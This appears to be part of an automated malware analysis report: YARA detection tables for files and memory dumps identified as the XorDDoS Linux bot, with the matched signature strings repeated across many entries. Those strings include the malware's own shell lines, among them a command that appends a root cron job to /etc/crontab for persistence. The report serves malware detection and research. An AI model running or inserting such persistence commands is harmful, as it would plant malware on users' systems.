/usr/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/snluqxjnyb	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/snluqxjnyb	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/snluqxjnyb	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/jeyjdycnpv	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/jeyjdycnpv	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/jeyjdycnpv	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/jeyjdycnpv	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/bgoiqqymph	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/bgoiqqymph	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/bgoiqqymph	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/bgoiqqymph	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/dthtwwmqvu	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/dthtwwmqvu	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/dthtwwmqvu	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/dthtwwmqvu	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 58 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6455.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6455.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6455.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6381.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6455.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6381.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6381.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6381.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6262.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6262.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6262.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6262.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6296.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6296.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6296.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6296.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6375.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6375.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6375.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6375.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6260.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6260.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6260.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6260.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6552.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6552.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6552.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6552.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6303.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6303.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6303.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6303.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6400.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6400.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6400.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6400.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6372.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6372.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6372.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6372.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6482.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6482.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6482.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6482.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6513.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6513.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6513.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6513.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6516.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6516.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6516.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6516.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6408.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6408.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6408.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6408.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6474.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6474.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6474.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6474.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6298.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6298.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6298.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6298.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6525.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6525.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6525.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6525.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6457.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6457.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6457.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6457.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6391.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6391.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6391.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6391.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
